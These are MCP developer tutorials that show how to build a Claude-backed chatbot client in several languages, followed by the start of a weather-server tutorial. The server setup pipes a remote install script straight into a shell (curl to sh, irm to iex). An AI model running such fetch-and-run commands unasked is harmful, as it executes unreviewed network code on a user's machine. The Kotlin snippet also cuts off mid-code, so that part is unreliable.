# Build an MCP client
Source: https://modelcontextprotocol.io/docs/develop/build-client
Get started building your own client that can integrate with all MCP servers.
In this tutorial, you'll learn how to build an LLM-powered chatbot client that connects to MCP servers.
Before you begin, it helps to have gone through our [Build an MCP Server](/docs/develop/build-server) tutorial so you can understand how clients and servers communicate.
[You can find the complete code for this tutorial here.](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/mcp-client-python)
## System Requirements
Before starting, ensure your system meets these requirements:
* Mac or Windows computer
* Latest Python version installed
* Latest version of `uv` installed
## Setting Up Your Environment
First, create a new Python project with `uv`:
```bash macOS/Linux theme={null}
# Create project directory
uv init mcp-client
cd mcp-client
# Create virtual environment
uv venv
# Activate virtual environment
source .venv/bin/activate
# Install required packages
uv add mcp anthropic python-dotenv
# Remove boilerplate files
rm main.py
# Create our main file
touch client.py
```
```powershell Windows theme={null}
# Create project directory
uv init mcp-client
cd mcp-client
# Create virtual environment
uv venv
# Activate virtual environment
.venv\Scripts\activate
# Install required packages
uv add mcp anthropic python-dotenv
# Remove boilerplate files
del main.py
# Create our main file
new-item client.py
```
## Setting Up Your API Key
You'll need an Anthropic API key from the [Anthropic Console](https://console.anthropic.com/settings/keys).
Create a `.env` file to store it:
```bash theme={null}
echo "ANTHROPIC_API_KEY=your-api-key-goes-here" > .env
```
Add `.env` to your `.gitignore`:
```bash theme={null}
echo ".env" >> .gitignore
```
Make sure you keep your `ANTHROPIC_API_KEY` secure!
## Creating the Client
### Basic Client Structure
First, let's set up our imports and create the basic client class:
```python theme={null}
import asyncio
from typing import Optional
from contextlib import AsyncExitStack
from mcp import ClientSession, StdioServerParameters
from mcp.client.stdio import stdio_client
from anthropic import Anthropic
from dotenv import load_dotenv
load_dotenv() # load environment variables from .env
class MCPClient:
def __init__(self):
# Initialize session and client objects
self.session: Optional[ClientSession] = None
self.exit_stack = AsyncExitStack()
self.anthropic = Anthropic()
# methods will go here
```
### Server Connection Management
Next, we'll implement the method to connect to an MCP server:
```python theme={null}
async def connect_to_server(self, server_script_path: str):
"""Connect to an MCP server
Args:
server_script_path: Path to the server script (.py or .js)
"""
is_python = server_script_path.endswith('.py')
is_js = server_script_path.endswith('.js')
if not (is_python or is_js):
raise ValueError("Server script must be a .py or .js file")
command = "python" if is_python else "node"
server_params = StdioServerParameters(
command=command,
args=[server_script_path],
env=None
)
stdio_transport = await self.exit_stack.enter_async_context(stdio_client(server_params))
self.stdio, self.write = stdio_transport
self.session = await self.exit_stack.enter_async_context(ClientSession(self.stdio, self.write))
await self.session.initialize()
# List available tools
response = await self.session.list_tools()
tools = response.tools
print("\nConnected to server with tools:", [tool.name for tool in tools])
```
### Query Processing Logic
Now let's add the core functionality for processing queries and handling tool calls:
```python theme={null}
async def process_query(self, query: str) -> str:
"""Process a query using Claude and available tools"""
messages = [
{
"role": "user",
"content": query
}
]
response = await self.session.list_tools()
available_tools = [{
"name": tool.name,
"description": tool.description,
"input_schema": tool.inputSchema
} for tool in response.tools]
# Initial Claude API call
response = self.anthropic.messages.create(
model="claude-sonnet-4-20250514",
max_tokens=1000,
messages=messages,
tools=available_tools
)
# Process response and handle tool calls
final_text = []
assistant_message_content = []
for content in response.content:
if content.type == 'text':
final_text.append(content.text)
assistant_message_content.append(content)
elif content.type == 'tool_use':
tool_name = content.name
tool_args = content.input
# Execute tool call
result = await self.session.call_tool(tool_name, tool_args)
final_text.append(f"[Calling tool {tool_name} with args {tool_args}]")
assistant_message_content.append(content)
messages.append({
"role": "assistant",
"content": assistant_message_content
})
messages.append({
"role": "user",
"content": [
{
"type": "tool_result",
"tool_use_id": content.id,
"content": result.content
}
]
})
# Get next response from Claude
response = self.anthropic.messages.create(
model="claude-sonnet-4-20250514",
max_tokens=1000,
messages=messages,
tools=available_tools
)
final_text.append(response.content[0].text)
return "\n".join(final_text)
```
### Interactive Chat Interface
Now we'll add the chat loop and cleanup functionality:
```python theme={null}
async def chat_loop(self):
"""Run an interactive chat loop"""
print("\nMCP Client Started!")
print("Type your queries or 'quit' to exit.")
while True:
try:
query = input("\nQuery: ").strip()
if query.lower() == 'quit':
break
response = await self.process_query(query)
print("\n" + response)
except Exception as e:
print(f"\nError: {str(e)}")
async def cleanup(self):
"""Clean up resources"""
await self.exit_stack.aclose()
```
### Main Entry Point
Finally, we'll add the main execution logic:
```python theme={null}
async def main():
if len(sys.argv) < 2:
print("Usage: python client.py ")
sys.exit(1)
client = MCPClient()
try:
await client.connect_to_server(sys.argv[1])
await client.chat_loop()
finally:
await client.cleanup()
if __name__ == "__main__":
import sys
asyncio.run(main())
```
You can find the complete `client.py` file [here](https://github.com/modelcontextprotocol/quickstart-resources/blob/main/mcp-client-python/client.py).
## Key Components Explained
### 1. Client Initialization
* The `MCPClient` class initializes with session management and API clients
* Uses `AsyncExitStack` for proper resource management
* Configures the Anthropic client for Claude interactions
### 2. Server Connection
* Supports both Python and Node.js servers
* Validates server script type
* Sets up proper communication channels
* Initializes the session and lists available tools
### 3. Query Processing
* Maintains conversation context
* Handles Claude's responses and tool calls
* Manages the message flow between Claude and tools
* Combines results into a coherent response
### 4. Interactive Interface
* Provides a simple command-line interface
* Handles user input and displays responses
* Includes basic error handling
* Allows graceful exit
### 5. Resource Management
* Proper cleanup of resources
* Error handling for connection issues
* Graceful shutdown procedures
## Common Customization Points
1. **Tool Handling**
* Modify `process_query()` to handle specific tool types
* Add custom error handling for tool calls
* Implement tool-specific response formatting
2. **Response Processing**
* Customize how tool results are formatted
* Add response filtering or transformation
* Implement custom logging
3. **User Interface**
* Add a GUI or web interface
* Implement rich console output
* Add command history or auto-completion
## Running the Client
To run your client with any MCP server:
```bash theme={null}
uv run client.py path/to/server.py # python server
uv run client.py path/to/build/index.js # node server
```
If you're continuing [the weather tutorial from the server quickstart](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-python), your command might look something like this: `python client.py .../quickstart-resources/weather-server-python/weather.py`
The client will:
1. Connect to the specified server
2. List available tools
3. Start an interactive chat session where you can:
* Enter queries
* See tool executions
* Get responses from Claude
Here's an example of what it should look like if connected to the weather server from the server quickstart:
## How It Works
When you submit a query:
1. The client gets the list of available tools from the server
2. Your query is sent to Claude along with tool descriptions
3. Claude decides which tools (if any) to use
4. The client executes any requested tool calls through the server
5. Results are sent back to Claude
6. Claude provides a natural language response
7. The response is displayed to you
## Best practices
1. **Error Handling**
* Always wrap tool calls in try-catch blocks
* Provide meaningful error messages
* Gracefully handle connection issues
2. **Resource Management**
* Use `AsyncExitStack` for proper cleanup
* Close connections when done
* Handle server disconnections
3. **Security**
* Store API keys securely in `.env`
* Validate server responses
* Be cautious with tool permissions
4. **Tool Names**
* Tool names can be validated according to the format specified [here](/specification/draft/server/tools#tool-names)
* If a tool name conforms to the specified format, it should not fail validation by an MCP client
## Troubleshooting
### Server Path Issues
* Double-check the path to your server script is correct
* Use the absolute path if the relative path isn't working
* For Windows users, make sure to use forward slashes (/) or escaped backslashes (\\) in the path
* Verify the server file has the correct extension (.py for Python or .js for Node.js)
Example of correct path usage:
```bash theme={null}
# Relative path
uv run client.py ./server/weather.py
# Absolute path
uv run client.py /Users/username/projects/mcp-server/weather.py
# Windows path (either format works)
uv run client.py C:/projects/mcp-server/weather.py
uv run client.py C:\\projects\\mcp-server\\weather.py
```
### Response Timing
* The first response might take up to 30 seconds to return
* This is normal and happens while:
* The server initializes
* Claude processes the query
* Tools are being executed
* Subsequent responses are typically faster
* Don't interrupt the process during this initial waiting period
### Common Error Messages
If you see:
* `FileNotFoundError`: Check your server path
* `Connection refused`: Ensure the server is running and the path is correct
* `Tool execution failed`: Verify the tool's required environment variables are set
* `Timeout error`: Consider increasing the timeout in your client configuration
[You can find the complete code for this tutorial here.](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/mcp-client-typescript)
## System Requirements
Before starting, ensure your system meets these requirements:
* Mac or Windows computer
* Node.js 17 or higher installed
* Latest version of `npm` installed
* Anthropic API key (Claude)
## Setting Up Your Environment
First, let's create and set up our project:
```bash macOS/Linux theme={null}
# Create project directory
mkdir mcp-client-typescript
cd mcp-client-typescript
# Initialize npm project
npm init -y
# Install dependencies
npm install @anthropic-ai/sdk @modelcontextprotocol/sdk dotenv
# Install dev dependencies
npm install -D @types/node typescript
# Create source file
touch index.ts
```
```powershell Windows theme={null}
# Create project directory
md mcp-client-typescript
cd mcp-client-typescript
# Initialize npm project
npm init -y
# Install dependencies
npm install @anthropic-ai/sdk @modelcontextprotocol/sdk dotenv
# Install dev dependencies
npm install -D @types/node typescript
# Create source file
new-item index.ts
```
Update your `package.json` to set `type: "module"` and a build script:
```json package.json theme={null}
{
"type": "module",
"scripts": {
"build": "tsc && chmod 755 build/index.js"
}
}
```
Create a `tsconfig.json` in the root of your project:
```json tsconfig.json theme={null}
{
"compilerOptions": {
"target": "ES2022",
"module": "Node16",
"moduleResolution": "Node16",
"outDir": "./build",
"rootDir": "./",
"strict": true,
"esModuleInterop": true,
"skipLibCheck": true,
"forceConsistentCasingInFileNames": true
},
"include": ["index.ts"],
"exclude": ["node_modules"]
}
```
## Setting Up Your API Key
You'll need an Anthropic API key from the [Anthropic Console](https://console.anthropic.com/settings/keys).
Create a `.env` file to store it:
```bash theme={null}
echo "ANTHROPIC_API_KEY=" > .env
```
Add `.env` to your `.gitignore`:
```bash theme={null}
echo ".env" >> .gitignore
```
Make sure you keep your `ANTHROPIC_API_KEY` secure!
## Creating the Client
### Basic Client Structure
First, let's set up our imports and create the basic client class in `index.ts`:
```typescript theme={null}
import { Anthropic } from "@anthropic-ai/sdk";
import {
MessageParam,
Tool,
} from "@anthropic-ai/sdk/resources/messages/messages.mjs";
import { Client } from "@modelcontextprotocol/sdk/client/index.js";
import { StdioClientTransport } from "@modelcontextprotocol/sdk/client/stdio.js";
import readline from "readline/promises";
import dotenv from "dotenv";
dotenv.config();
const ANTHROPIC_API_KEY = process.env.ANTHROPIC_API_KEY;
if (!ANTHROPIC_API_KEY) {
throw new Error("ANTHROPIC_API_KEY is not set");
}
class MCPClient {
private mcp: Client;
private anthropic: Anthropic;
private transport: StdioClientTransport | null = null;
private tools: Tool[] = [];
constructor() {
this.anthropic = new Anthropic({
apiKey: ANTHROPIC_API_KEY,
});
this.mcp = new Client({ name: "mcp-client-cli", version: "1.0.0" });
}
// methods will go here
}
```
### Server Connection Management
Next, we'll implement the method to connect to an MCP server:
```typescript theme={null}
async connectToServer(serverScriptPath: string) {
try {
const isJs = serverScriptPath.endsWith(".js");
const isPy = serverScriptPath.endsWith(".py");
if (!isJs && !isPy) {
throw new Error("Server script must be a .js or .py file");
}
const command = isPy
? process.platform === "win32"
? "python"
: "python3"
: process.execPath;
this.transport = new StdioClientTransport({
command,
args: [serverScriptPath],
});
await this.mcp.connect(this.transport);
const toolsResult = await this.mcp.listTools();
this.tools = toolsResult.tools.map((tool) => {
return {
name: tool.name,
description: tool.description,
input_schema: tool.inputSchema,
};
});
console.log(
"Connected to server with tools:",
this.tools.map(({ name }) => name)
);
} catch (e) {
console.log("Failed to connect to MCP server: ", e);
throw e;
}
}
```
### Query Processing Logic
Now let's add the core functionality for processing queries and handling tool calls:
```typescript theme={null}
async processQuery(query: string) {
const messages: MessageParam[] = [
{
role: "user",
content: query,
},
];
const response = await this.anthropic.messages.create({
model: "claude-sonnet-4-20250514",
max_tokens: 1000,
messages,
tools: this.tools,
});
const finalText = [];
for (const content of response.content) {
if (content.type === "text") {
finalText.push(content.text);
} else if (content.type === "tool_use") {
const toolName = content.name;
const toolArgs = content.input as { [x: string]: unknown } | undefined;
const result = await this.mcp.callTool({
name: toolName,
arguments: toolArgs,
});
finalText.push(
`[Calling tool ${toolName} with args ${JSON.stringify(toolArgs)}]`
);
messages.push({
role: "user",
content: result.content as string,
});
const response = await this.anthropic.messages.create({
model: "claude-sonnet-4-20250514",
max_tokens: 1000,
messages,
});
finalText.push(
response.content[0].type === "text" ? response.content[0].text : ""
);
}
}
return finalText.join("\n");
}
```
### Interactive Chat Interface
Now we'll add the chat loop and cleanup functionality:
```typescript theme={null}
async chatLoop() {
const rl = readline.createInterface({
input: process.stdin,
output: process.stdout,
});
try {
console.log("\nMCP Client Started!");
console.log("Type your queries or 'quit' to exit.");
while (true) {
const message = await rl.question("\nQuery: ");
if (message.toLowerCase() === "quit") {
break;
}
const response = await this.processQuery(message);
console.log("\n" + response);
}
} finally {
rl.close();
}
}
async cleanup() {
await this.mcp.close();
}
```
### Main Entry Point
Finally, we'll add the main execution logic:
```typescript theme={null}
async function main() {
if (process.argv.length < 3) {
console.log("Usage: node index.ts ");
return;
}
const mcpClient = new MCPClient();
try {
await mcpClient.connectToServer(process.argv[2]);
await mcpClient.chatLoop();
} catch (e) {
console.error("Error:", e);
await mcpClient.cleanup();
process.exit(1);
} finally {
await mcpClient.cleanup();
process.exit(0);
}
}
main();
```
## Running the Client
To run your client with any MCP server:
```bash theme={null}
# Build TypeScript
npm run build
# Run the client
node build/index.js path/to/server.py # python server
node build/index.js path/to/build/index.js # node server
```
If you're continuing [the weather tutorial from the server quickstart](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-typescript), your command might look something like this: `node build/index.js .../quickstart-resources/weather-server-typescript/build/index.js`
**The client will:**
1. Connect to the specified server
2. List available tools
3. Start an interactive chat session where you can:
* Enter queries
* See tool executions
* Get responses from Claude
## How It Works
When you submit a query:
1. The client gets the list of available tools from the server
2. Your query is sent to Claude along with tool descriptions
3. Claude decides which tools (if any) to use
4. The client executes any requested tool calls through the server
5. Results are sent back to Claude
6. Claude provides a natural language response
7. The response is displayed to you
## Best practices
1. **Error Handling**
* Use TypeScript's type system for better error detection
* Wrap tool calls in try-catch blocks
* Provide meaningful error messages
* Gracefully handle connection issues
2. **Security**
* Store API keys securely in `.env`
* Validate server responses
* Be cautious with tool permissions
## Troubleshooting
### Server Path Issues
* Double-check the path to your server script is correct
* Use the absolute path if the relative path isn't working
* For Windows users, make sure to use forward slashes (/) or escaped backslashes (\\) in the path
* Verify the server file has the correct extension (.js for Node.js or .py for Python)
Example of correct path usage:
```bash theme={null}
# Relative path
node build/index.js ./server/build/index.js
# Absolute path
node build/index.js /Users/username/projects/mcp-server/build/index.js
# Windows path (either format works)
node build/index.js C:/projects/mcp-server/build/index.js
node build/index.js C:\\projects\\mcp-server\\build\\index.js
```
### Response Timing
* The first response might take up to 30 seconds to return
* This is normal and happens while:
* The server initializes
* Claude processes the query
* Tools are being executed
* Subsequent responses are typically faster
* Don't interrupt the process during this initial waiting period
### Common Error Messages
If you see:
* `Error: Cannot find module`: Check your build folder and ensure TypeScript compilation succeeded
* `Connection refused`: Ensure the server is running and the path is correct
* `Tool execution failed`: Verify the tool's required environment variables are set
* `ANTHROPIC_API_KEY is not set`: Check your .env file and environment variables
* `TypeError`: Ensure you're using the correct types for tool arguments
* `BadRequestError`: Ensure you have enough credits to access the Anthropic API
This is a quickstart demo based on Spring AI MCP auto-configuration and boot starters.
To learn how to create sync and async MCP Clients manually, consult the [Java SDK Client](/sdk/java/mcp-client) documentation
This example demonstrates how to build an interactive chatbot that combines Spring AI's Model Context Protocol (MCP) with the [Brave Search MCP Server](https://github.com/modelcontextprotocol/servers-archived/tree/main/src/brave-search). The application creates a conversational interface powered by Anthropic's Claude AI model that can perform internet searches through Brave Search, enabling natural language interactions with real-time web data.
[You can find the complete code for this tutorial here.](https://github.com/spring-projects/spring-ai-examples/tree/main/model-context-protocol/web-search/brave-chatbot)
## System Requirements
Before starting, ensure your system meets these requirements:
* Java 17 or higher
* Maven 3.6+
* npx package manager
* Anthropic API key (Claude)
* Brave Search API key
## Setting Up Your Environment
1. Install npx (Node Package eXecute):
First, make sure to install [npm](https://docs.npmjs.com/downloading-and-installing-node-js-and-npm)
and then run:
```bash theme={null}
npm install -g npx
```
2. Clone the repository:
```bash theme={null}
git clone https://github.com/spring-projects/spring-ai-examples.git
cd model-context-protocol/web-search/brave-chatbot
```
3. Set up your API keys:
```bash theme={null}
export ANTHROPIC_API_KEY='your-anthropic-api-key-here'
export BRAVE_API_KEY='your-brave-api-key-here'
```
4. Build the application:
```bash theme={null}
./mvnw clean install
```
5. Run the application using Maven:
```bash theme={null}
./mvnw spring-boot:run
```
Make sure you keep your `ANTHROPIC_API_KEY` and `BRAVE_API_KEY` keys secure!
## How it Works
The application integrates Spring AI with the Brave Search MCP server through several components:
### MCP Client Configuration
1. Required dependencies in pom.xml:
```xml theme={null}
org.springframework.aispring-ai-starter-mcp-clientorg.springframework.aispring-ai-starter-model-anthropic
```
2. Application properties (application.yml):
```yml theme={null}
spring:
ai:
mcp:
client:
enabled: true
name: brave-search-client
version: 1.0.0
type: SYNC
request-timeout: 20s
stdio:
root-change-notification: true
servers-configuration: classpath:/mcp-servers-config.json
toolcallback:
enabled: true
anthropic:
api-key: ${ANTHROPIC_API_KEY}
```
This activates the `spring-ai-starter-mcp-client` to create one or more `McpClient`s based on the provided server configuration.
The `spring.ai.mcp.client.toolcallback.enabled=true` property enables the tool callback mechanism, that automatically registers all MCP tool as spring ai tools.
It is disabled by default.
3. MCP Server Configuration (`mcp-servers-config.json`):
```json theme={null}
{
"mcpServers": {
"brave-search": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-brave-search"],
"env": {
"BRAVE_API_KEY": ""
}
}
}
}
```
### Chat Implementation
The chatbot is implemented using Spring AI's ChatClient with MCP tool integration:
```java theme={null}
var chatClient = chatClientBuilder
.defaultSystem("You are useful assistant, expert in AI and Java.")
.defaultToolCallbacks((Object[]) mcpToolAdapter.toolCallbacks())
.defaultAdvisors(new MessageChatMemoryAdvisor(new InMemoryChatMemory()))
.build();
```
Key features:
* Uses Claude AI model for natural language understanding
* Integrates Brave Search through MCP for real-time web search capabilities
* Maintains conversation memory using InMemoryChatMemory
* Runs as an interactive command-line application
### Build and run
```bash theme={null}
./mvnw clean install
java -jar ./target/ai-mcp-brave-chatbot-0.0.1-SNAPSHOT.jar
```
or
```bash theme={null}
./mvnw spring-boot:run
```
The application will start an interactive chat session where you can ask questions. The chatbot will use Brave Search when it needs to find information from the internet to answer your queries.
The chatbot can:
* Answer questions using its built-in knowledge
* Perform web searches when needed using Brave Search
* Remember context from previous messages in the conversation
* Combine information from multiple sources to provide comprehensive answers
### Advanced Configuration
The MCP client supports additional configuration options:
* Client customization through `McpSyncClientCustomizer` or `McpAsyncClientCustomizer`
* Multiple clients with multiple transport types: `STDIO` and `SSE` (Server-Sent Events)
* Integration with Spring AI's tool execution framework
* Automatic client initialization and lifecycle management
For WebFlux-based applications, you can use the WebFlux starter instead:
```xml theme={null}
org.springframework.aispring-ai-mcp-client-webflux-spring-boot-starter
```
This provides similar functionality but uses a WebFlux-based SSE transport implementation, recommended for production deployments.
[You can find the complete code for this tutorial here.](https://github.com/modelcontextprotocol/kotlin-sdk/tree/main/samples/kotlin-mcp-client)
## System Requirements
Before starting, ensure your system meets these requirements:
* Java 17 or higher
* Anthropic API key (Claude)
## Setting up your environment
First, let's install `java` and `gradle` if you haven't already.
You can download `java` from [official Oracle JDK website](https://www.oracle.com/java/technologies/downloads/).
Verify your `java` installation:
```bash theme={null}
java --version
```
Now, let's create and set up your project:
```bash macOS/Linux theme={null}
# Create a new directory for our project
mkdir kotlin-mcp-client
cd kotlin-mcp-client
# Initialize a new kotlin project
gradle init
```
```powershell Windows theme={null}
# Create a new directory for our project
md kotlin-mcp-client
cd kotlin-mcp-client
# Initialize a new kotlin project
gradle init
```
After running `gradle init`, you will be presented with options for creating your project.
Select **Application** as the project type, **Kotlin** as the programming language, and **Java 17** as the Java version.
Alternatively, you can create a Kotlin application using the [IntelliJ IDEA project wizard](https://kotlinlang.org/docs/jvm-get-started.html).
After creating the project, add the following dependencies:
```kotlin build.gradle.kts theme={null}
val mcpVersion = "0.4.0"
val slf4jVersion = "2.0.9"
val anthropicVersion = "0.8.0"
dependencies {
implementation("io.modelcontextprotocol:kotlin-sdk:$mcpVersion")
implementation("org.slf4j:slf4j-nop:$slf4jVersion")
implementation("com.anthropic:anthropic-java:$anthropicVersion")
}
```
```groovy build.gradle theme={null}
def mcpVersion = '0.3.0'
def slf4jVersion = '2.0.9'
def anthropicVersion = '0.8.0'
dependencies {
implementation "io.modelcontextprotocol:kotlin-sdk:$mcpVersion"
implementation "org.slf4j:slf4j-nop:$slf4jVersion"
implementation "com.anthropic:anthropic-java:$anthropicVersion"
}
```
Also, add the following plugins to your build script:
```kotlin build.gradle.kts theme={null}
plugins {
id("com.gradleup.shadow") version "8.3.9"
}
```
```groovy build.gradle theme={null}
plugins {
id 'com.gradleup.shadow' version '8.3.9'
}
```
## Setting up your API key
You'll need an Anthropic API key from the [Anthropic Console](https://console.anthropic.com/settings/keys).
Set up your API key:
```bash theme={null}
export ANTHROPIC_API_KEY='your-anthropic-api-key-here'
```
Make sure you keep your `ANTHROPIC_API_KEY` secure!
## Creating the Client
### Basic Client Structure
First, let's create the basic client class:
```kotlin theme={null}
class MCPClient : AutoCloseable {
private val anthropic = AnthropicOkHttpClient.fromEnv()
private val mcp: Client = Client(clientInfo = Implementation(name = "mcp-client-cli", version = "1.0.0"))
private lateinit var tools: List
// methods will go here
override fun close() {
runBlocking {
mcp.close()
anthropic.close()
}
}
```
### Server connection management
Next, we'll implement the method to connect to an MCP server:
```kotlin theme={null}
suspend fun connectToServer(serverScriptPath: String) {
try {
val command = buildList {
when (serverScriptPath.substringAfterLast(".")) {
"js" -> add("node")
"py" -> add(if (System.getProperty("os.name").lowercase().contains("win")) "python" else "python3")
"jar" -> addAll(listOf("java", "-jar"))
else -> throw IllegalArgumentException("Server script must be a .js, .py or .jar file")
}
add(serverScriptPath)
}
val process = ProcessBuilder(command).start()
val transport = StdioClientTransport(
input = process.inputStream.asSource().buffered(),
output = process.outputStream.asSink().buffered()
)
mcp.connect(transport)
val toolsResult = mcp.listTools()
tools = toolsResult?.tools?.map { tool ->
ToolUnion.ofTool(
Tool.builder()
.name(tool.name)
.description(tool.description ?: "")
.inputSchema(
Tool.InputSchema.builder()
.type(JsonValue.from(tool.inputSchema.type))
.properties(tool.inputSchema.properties.toJsonValue())
.putAdditionalProperty("required", JsonValue.from(tool.inputSchema.required))
.build()
)
.build()
)
} ?: emptyList()
println("Connected to server with tools: ${tools.joinToString(", ") { it.tool().get().name() }}")
} catch (e: Exception) {
println("Failed to connect to MCP server: $e")
throw e
}
}
```
Also create a helper function to convert from `JsonObject` to `JsonValue` for Anthropic:
```kotlin theme={null}
private fun JsonObject.toJsonValue(): JsonValue {
val mapper = ObjectMapper()
val node = mapper.readTree(this.toString())
return JsonValue.fromJsonNode(node)
}
```
### Query processing logic
Now let's add the core functionality for processing queries and handling tool calls:
```kotlin theme={null}
private val messageParamsBuilder: MessageCreateParams.Builder = MessageCreateParams.builder()
.model(Model.CLAUDE_SONNET_4_20250514)
.maxTokens(1024)
suspend fun processQuery(query: String): String {
val messages = mutableListOf(
MessageParam.builder()
.role(MessageParam.Role.USER)
.content(query)
.build()
)
val response = anthropic.messages().create(
messageParamsBuilder
.messages(messages)
.tools(tools)
.build()
)
val finalText = mutableListOf()
response.content().forEach { content ->
when {
content.isText() -> finalText.add(content.text().getOrNull()?.text() ?: "")
content.isToolUse() -> {
val toolName = content.toolUse().get().name()
val toolArgs =
content.toolUse().get()._input().convert(object : TypeReference
[You can find the complete code for this tutorial here.](https://github.com/modelcontextprotocol/csharp-sdk/tree/main/samples/QuickstartClient)
## System Requirements
Before starting, ensure your system meets these requirements:
* .NET 8.0 or higher
* Anthropic API key (Claude)
* Windows, Linux, or macOS
## Setting up your environment
First, create a new .NET project:
```bash theme={null}
dotnet new console -n QuickstartClient
cd QuickstartClient
```
Then, add the required dependencies to your project:
```bash theme={null}
dotnet add package ModelContextProtocol --prerelease
dotnet add package Anthropic.SDK
dotnet add package Microsoft.Extensions.Hosting
dotnet add package Microsoft.Extensions.AI
```
## Setting up your API key
You'll need an Anthropic API key from the [Anthropic Console](https://console.anthropic.com/settings/keys).
```bash theme={null}
dotnet user-secrets init
dotnet user-secrets set "ANTHROPIC_API_KEY" ""
```
## Creating the Client
### Basic Client Structure
First, let's setup the basic client class in the file `Program.cs`:
```csharp theme={null}
using Anthropic.SDK;
using Microsoft.Extensions.AI;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.Hosting;
using ModelContextProtocol.Client;
using ModelContextProtocol.Protocol.Transport;
var builder = Host.CreateApplicationBuilder(args);
builder.Configuration
.AddEnvironmentVariables()
.AddUserSecrets();
```
This creates the beginnings of a .NET console application that can read the API key from user secrets.
Next, we'll setup the MCP Client:
```csharp theme={null}
var (command, arguments) = GetCommandAndArguments(args);
var clientTransport = new StdioClientTransport(new()
{
Name = "Demo Server",
Command = command,
Arguments = arguments,
});
await using var mcpClient = await McpClient.CreateAsync(clientTransport);
var tools = await mcpClient.ListToolsAsync();
foreach (var tool in tools)
{
Console.WriteLine($"Connected to server with tools: {tool.Name}");
}
```
Add this function at the end of the `Program.cs` file:
```csharp theme={null}
static (string command, string[] arguments) GetCommandAndArguments(string[] args)
{
return args switch
{
[var script] when script.EndsWith(".py") => ("python", args),
[var script] when script.EndsWith(".js") => ("node", args),
[var script] when Directory.Exists(script) || (File.Exists(script) && script.EndsWith(".csproj")) => ("dotnet", ["run", "--project", script, "--no-build"]),
_ => throw new NotSupportedException("An unsupported server script was provided. Supported scripts are .py, .js, or .csproj")
};
}
```
This creates an MCP client that will connect to a server that is provided as a command line argument. It then lists the available tools from the connected server.
### Query processing logic
Now let's add the core functionality for processing queries and handling tool calls:
```csharp theme={null}
using var anthropicClient = new AnthropicClient(new APIAuthentication(builder.Configuration["ANTHROPIC_API_KEY"]))
.Messages
.AsBuilder()
.UseFunctionInvocation()
.Build();
var options = new ChatOptions
{
MaxOutputTokens = 1000,
ModelId = "claude-sonnet-4-20250514",
Tools = [.. tools]
};
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("MCP Client Started!");
Console.ResetColor();
PromptForInput();
while(Console.ReadLine() is string query && !"exit".Equals(query, StringComparison.OrdinalIgnoreCase))
{
if (string.IsNullOrWhiteSpace(query))
{
PromptForInput();
continue;
}
await foreach (var message in anthropicClient.GetStreamingResponseAsync(query, options))
{
Console.Write(message);
}
Console.WriteLine();
PromptForInput();
}
static void PromptForInput()
{
Console.WriteLine("Enter a command (or 'exit' to quit):");
Console.ForegroundColor = ConsoleColor.Cyan;
Console.Write("> ");
Console.ResetColor();
}
```
## Key Components Explained
### 1. Client Initialization
* The client is initialized using `McpClient.CreateAsync()`, which sets up the transport type and command to run the server.
### 2. Server Connection
* Supports Python, Node.js, and .NET servers.
* The server is started using the command specified in the arguments.
* Configures to use stdio for communication with the server.
* Initializes the session and available tools.
### 3. Query Processing
* Leverages [Microsoft.Extensions.AI](https://learn.microsoft.com/dotnet/ai/ai-extensions) for the chat client.
* Configures the `IChatClient` to use automatic tool (function) invocation.
* The client reads user input and sends it to the server.
* The server processes the query and returns a response.
* The response is displayed to the user.
## Running the Client
To run your client with any MCP server:
```bash theme={null}
dotnet run -- path/to/server.csproj # dotnet server
dotnet run -- path/to/server.py # python server
dotnet run -- path/to/server.js # node server
```
If you're continuing the weather tutorial from the server quickstart, your command might look something like this: `dotnet run -- path/to/QuickstartWeatherServer`.
The client will:
1. Connect to the specified server
2. List available tools
3. Start an interactive chat session where you can:
* Enter queries
* See tool executions
* Get responses from Claude
4. Exit the session when done
Here's an example of what it should look like if connected to the weather server quickstart:
## Next steps
Check out our gallery of official MCP servers and implementations
View the list of clients that support MCP integrations
# Build an MCP server
Source: https://modelcontextprotocol.io/docs/develop/build-server
Get started building your own server to use in Claude for Desktop and other clients.
In this tutorial, we'll build a simple MCP weather server and connect it to a host, Claude for Desktop.
### What we'll be building
We'll build a server that exposes two tools: `get_alerts` and `get_forecast`. Then we'll connect the server to an MCP host (in this case, Claude for Desktop):
Servers can connect to any client. We've chosen Claude for Desktop here for simplicity, but we also have guides on [building your own client](/docs/develop/build-client) as well as a [list of other clients here](/clients).
### Core MCP Concepts
MCP servers can provide three main types of capabilities:
1. **[Resources](/docs/learn/server-concepts#resources)**: File-like data that can be read by clients (like API responses or file contents)
2. **[Tools](/docs/learn/server-concepts#tools)**: Functions that can be called by the LLM (with user approval)
3. **[Prompts](/docs/learn/server-concepts#prompts)**: Pre-written templates that help users accomplish specific tasks
This tutorial will primarily focus on tools.
Let's get started with building our weather server! [You can find the complete code for what we'll be building here.](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-python)
### Prerequisite knowledge
This quickstart assumes you have familiarity with:
* Python
* LLMs like Claude
### Logging in MCP Servers
When implementing MCP servers, be careful about how you handle logging:
**For STDIO-based servers:** Never write to standard output (stdout). This includes:
* `print()` statements in Python
* `console.log()` in JavaScript
* `fmt.Println()` in Go
* Similar stdout functions in other languages
Writing to stdout will corrupt the JSON-RPC messages and break your server.
**For HTTP-based servers:** Standard output logging is fine since it doesn't interfere with HTTP responses.
### Best Practices
1. Use a logging library that writes to stderr or files.
2. For Python, be especially careful - `print()` writes to stdout by default.
### Quick Examples
```python theme={null}
# ❌ Bad (STDIO)
print("Processing request")
# ✅ Good (STDIO)
import logging
logging.info("Processing request")
```
### System requirements
* Python 3.10 or higher installed.
* You must use the Python MCP SDK 1.2.0 or higher.
### Set up your environment
First, let's install `uv` and set up our Python project and environment:
```bash macOS/Linux theme={null}
curl -LsSf https://astral.sh/uv/install.sh | sh
```
```powershell Windows theme={null}
powershell -ExecutionPolicy ByPass -c "irm https://astral.sh/uv/install.ps1 | iex"
```
Make sure to restart your terminal afterwards to ensure that the `uv` command gets picked up.
Now, let's create and set up our project:
```bash macOS/Linux theme={null}
# Create a new directory for our project
uv init weather
cd weather
# Create virtual environment and activate it
